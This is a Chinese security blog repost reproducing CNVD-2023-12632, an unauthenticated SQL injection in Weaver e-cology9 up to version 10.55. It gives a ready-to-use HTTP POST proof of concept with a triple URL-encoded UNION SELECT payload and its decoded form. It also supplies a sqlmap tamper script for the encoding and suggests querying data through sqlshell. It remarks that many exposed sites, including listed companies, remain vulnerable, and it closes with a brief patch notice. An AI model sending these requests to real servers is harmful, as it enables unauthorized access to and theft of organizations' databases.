CNVD-2023-12632泛微e-cology9 未授权SQL注入漏洞复现

admin 2023年3月17日01:20:38评论789 views字数 2461阅读8分12秒阅读模式

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责

---------------------------------------------------------------------------------

上个月这个漏洞就复现了,但直到今天还是有师傅在问poc以及poc无效的问题。。。

别问了,以后这个不回复

在这放poc及脚本。

POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 1222
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%32%25%33%37%25%32%35%25%33%35%25%33%33%25%32%35%25%33%35%25%33%31%25%32%35%25%33%34%25%36%33%25%32%35%25%33%35%25%36%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%38%25%32%35%25%33%34%25%33%39%25%32%35%25%33%35%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%35%25%33%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

可以看我上一篇关于这个漏洞的文章~狗头

QVD-2023-5012-泛微E-cology9 SQL

漏洞影响范围为

Ecology9 <=10.55

这里的poc经过三次url全字符编码,原语句为:

a' union select 1,''+(select 'SQL_EXISTS')+'

CNVD-2023-12632--泛微e-cology9 未授权SQL注入漏洞复现

很明显的回显点,所以这不是盲注,这不是盲注,这不是盲注!!

不管盲注显注,显然可以直接上sqlmap,但有些师傅不会全字符编码,问gpt也不行,也就导致一跑脚本直接gg,这里放下tamper:

def tamper(payload, **kwargs):    # URL encoding for all characters    encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in payload])
encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in encoded_payload])
encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in encoded_payload]) encoded_payload = encoded_payload.replace(' ', '%20')
return encoded_payload

CNVD-2023-12632--泛微e-cology9 未授权SQL注入漏洞复现

到这里师傅们觉得sqlmap盲注太慢了,可以自己构造语句,直接查询:

CNVD-2023-12632--泛微e-cology9 未授权SQL注入漏洞复现

用sqlshell写语句查询:

CNVD-2023-12632泛微e-cology9 未授权SQL注入漏洞复现

或者自己写个脚本查询都行。。。

目前互联网上仍然有大量存在该漏洞的网站,包括上市集团。

修复方案

目前官方已发布安全补丁修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接如下:

https://www.weaver.com.cn/cs/securityDownload.asp#


原文始发于微信公众号(蓝猫Sec):CNVD-2023-12632--泛微e-cology9 未授权SQL注入漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月17日01:20:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CNVD-2023-12632泛微e-cology9 未授权SQL注入漏洞复现http://cn-sec.com/archives/1608338.html

发表评论

匿名网友 填写信息